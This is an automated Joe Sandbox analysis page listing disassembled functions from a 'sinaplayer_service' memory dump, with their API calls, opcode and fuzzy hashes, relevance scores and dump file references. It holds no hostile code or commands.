                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: 6f1ee19c7c8b059b5fdfa2dda48972aea28a6631aeb4a14a746fcdfbad988e02
                                                                                                                                                                                                    • Instruction ID: 2b5195015fec91105b9b67c195f0885405c457a5a9459b83ee50be13b282cfc5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f1ee19c7c8b059b5fdfa2dda48972aea28a6631aeb4a14a746fcdfbad988e02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6711E2B0804314DFCB11CF58D905B9ABBF8FB08720F10865AEC1597390D771A904CB90
                                                                                                                                                                                                    Function 00387AE0 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387B0F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387B2A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387B4E
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387B65
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: c22ca08de36d3373259673f36fc46a0442c751d05dbeaf110aa62393c2f05e8a
                                                                                                                                                                                                    • Instruction ID: d0de632d759d881eaa6961aa0f5e3053456e050ec4f1e950986fea94859497f6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c22ca08de36d3373259673f36fc46a0442c751d05dbeaf110aa62393c2f05e8a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11E0B1904758DFCB12CF58C905B9ABBF8FB09B20F10865AEC2697780D775AA04CB90
                                                                                                                                                                                                    Function 00387B90 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: 124c82c41c5cf1d0f1d46964b9ab6f862f1102362611142c21e967f92f5b5203
                                                                                                                                                                                                    • Instruction ID: e9d41e92a803c0bfe8e6f81ddd1bcc56768d1ed3e7d1a16297d1209a1cb68bfb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 124c82c41c5cf1d0f1d46964b9ab6f862f1102362611142c21e967f92f5b5203
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511A0B1904758DFCB12DF58C905B9ABBF8FB09720F10865AEC2697780D775AA04CB90
                                                                                                                                                                                                    Function 003876E0 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0038770F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(00000000,000000FF), ref: 0038772A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387746
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,00000000,000000FF), ref: 00387765
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: b897672326482d6bba5bed556ab5e9e6f01dc33725ac9af4159f51ee47fe872e
                                                                                                                                                                                                    • Instruction ID: 7b431778a888426a471b91a7a2bbe538bfb8f12564906230492c5e47c9c9493b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b897672326482d6bba5bed556ab5e9e6f01dc33725ac9af4159f51ee47fe872e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 201102B1904758DFCB11CF58C905B9ABBF8FB09B20F10865AEC2697780D775AA04CBD0
                                                                                                                                                                                                    Function 00387790 Relevance: 6.0, APIs: 4, Instructions: 47threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003877BF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003877DA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 003877F6
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0038780D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: e2bc0ff850b207308e4cce38c0a7c122f3b3f4f240772abb4309a96718eabba0
                                                                                                                                                                                                    • Instruction ID: bf6557bbe6baf24073222361193001e6fd7a57bb5900c5172103ddf9f095052f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2bc0ff850b207308e4cce38c0a7c122f3b3f4f240772abb4309a96718eabba0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9911E1B1804358DFCB12DF58C905B9ABBF8EB08B20F10865AEC2597780D7B5A904CBD0
                                                                                                                                                                                                    Function 00397D98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?terminate@@YAXXZ.MSVCR120 ref: 00397DD3
                                                                                                                                                                                                    • __crtSetUnhandledExceptionFilter.MSVCR120(00397D98), ref: 00397DDE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?terminate@@ExceptionFilterUnhandled__crt
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 327099231-1018135373
                                                                                                                                                                                                    • Opcode ID: 33659217f8d6e5dd94f7b63fe44d925ac7b41d8336ed4aefc24486925b2b32d1
                                                                                                                                                                                                    • Instruction ID: 9df6589d57b7930720507c97b0ac179ea431fa406b7b9d4c6be85b0a362a093c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33659217f8d6e5dd94f7b63fe44d925ac7b41d8336ed4aefc24486925b2b32d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE0D836128304DB8F3B9E6C984443E738EEF5030279A0851E048CFAD1DB20DD81C6A6
                                                                                                                                                                                                    Function 00376600 Relevance: 4.6, APIs: 3, Instructions: 58threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000002C), ref: 0037662F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0037664A
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 003766A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3993388104-0
                                                                                                                                                                                                    • Opcode ID: 0028bc8ad98c61277e7856cf23040226b49ad1a94110132b2e90c27d07162076
                                                                                                                                                                                                    • Instruction ID: c9a1499f7bf15d291669ab9b865b24c27124a4da5eed6db77b0cb7ddc7d5ac9f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0028bc8ad98c61277e7856cf23040226b49ad1a94110132b2e90c27d07162076
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E21AEB0904714DFDB21CF58C901B9ABBF8FB09724F10865EEC299B780D3B5A904CB90
                                                                                                                                                                                                    Function 0037E460 Relevance: 4.6, APIs: 3, Instructions: 55threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0037E48F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0037E4AA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0037E4EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 91e838d3afb0e9b3b26ffb7fa9aa736c7caef409db6ad1f35599d76c3b72dc37
                                                                                                                                                                                                    • Instruction ID: e62313884c8db784dc7e5c32cdef259f81bd11de394c5054aaf265a52a0d825b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91e838d3afb0e9b3b26ffb7fa9aa736c7caef409db6ad1f35599d76c3b72dc37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4215EB5905754DFCB21CF58C941A9ABBF8FB09720F10865AFC66D7790D374AA04CBA0
                                                                                                                                                                                                    Function 003878E0 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000020), ref: 0038790F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0038792A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0038796B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: f59ebd805f06277466250888132f8a312c4b1f9c0b70427d75548af46a601cc9
                                                                                                                                                                                                    • Instruction ID: 3b02cfbcb0b2c43092f6e62db95f5464c8bea8d08beee11f95c39a3584143c2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f59ebd805f06277466250888132f8a312c4b1f9c0b70427d75548af46a601cc9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A113AB5904715DFCB21CF58D941A9ABBF8FB09720F10866AE816D7790D771A904CB90
                                                                                                                                                                                                    Function 0037E510 Relevance: 4.6, APIs: 3, Instructions: 52threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0037E53F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0037E55A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0037E595
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: ed4794f5de6582660a8b496380cdae08508415fe051f69ee3cecb54d22637e44
                                                                                                                                                                                                    • Instruction ID: e9a5548edddc219f523d2f0cbf059bef7029b58afda3d5fb74dafbc81b93de53
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed4794f5de6582660a8b496380cdae08508415fe051f69ee3cecb54d22637e44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3118FB5904758DFCB21CF58C941B9ABBF8FB0DB20F10865AEC6697790D374A904CB90
                                                                                                                                                                                                    Function 003863C0 Relevance: 4.5, APIs: 3, Instructions: 49threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003863EF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,?), ref: 0038640A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,?), ref: 0038643D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 8445bd0f61ec4cd5236b51886702cfbea1ac49467969b5e9a7786db253bae028
                                                                                                                                                                                                    • Instruction ID: e1dc75fd1f55abb74e34548ca5656a9f20fc28672464fe0264f788d7bd13570c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8445bd0f61ec4cd5236b51886702cfbea1ac49467969b5e9a7786db253bae028
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B011A1B5904758DFCB21DF58D941B9ABBF8FB09B20F10866AEC26D7790D774A900CB90
                                                                                                                                                                                                    Function 00389C30 Relevance: 4.5, APIs: 3, Instructions: 49threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 00389C5F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00389C7A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00389CAD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 0ecac0c947343e6ed3dbab23173b3f2bce4bc9d37a76b8ebfd024ea5f39ba23a
                                                                                                                                                                                                    • Instruction ID: f83c1ba136d9b8c6afb01b3a6b869f77a3e56316e7ee21fcc55297ce729fdbca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ecac0c947343e6ed3dbab23173b3f2bce4bc9d37a76b8ebfd024ea5f39ba23a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9111CEB5904758DFCB21CF58C941B9ABBF8FB09B20F10865BEC2697790D375A900CBA0
                                                                                                                                                                                                    Function 00387C40 Relevance: 4.5, APIs: 3, Instructions: 48threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 00387C70
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,?), ref: 00387C8E
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,?), ref: 00387CB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: b82713ce0dddbd4f36ed4bbe17005e0e690b5cbb30b125b97f4530d2fc614921
                                                                                                                                                                                                    • Instruction ID: 78cd11f5bf377feb9ae04f6532f08a482919cdda9359293ebabe95997d1ea892
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b82713ce0dddbd4f36ed4bbe17005e0e690b5cbb30b125b97f4530d2fc614921
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 251104B1904709EFCB01CF19C801B9AFBF8FB44720F20826AE82597790D771A900CB90
                                                                                                                                                                                                    Function 00387990 Relevance: 4.5, APIs: 3, Instructions: 46threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010), ref: 003879BF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003879DA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387A05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
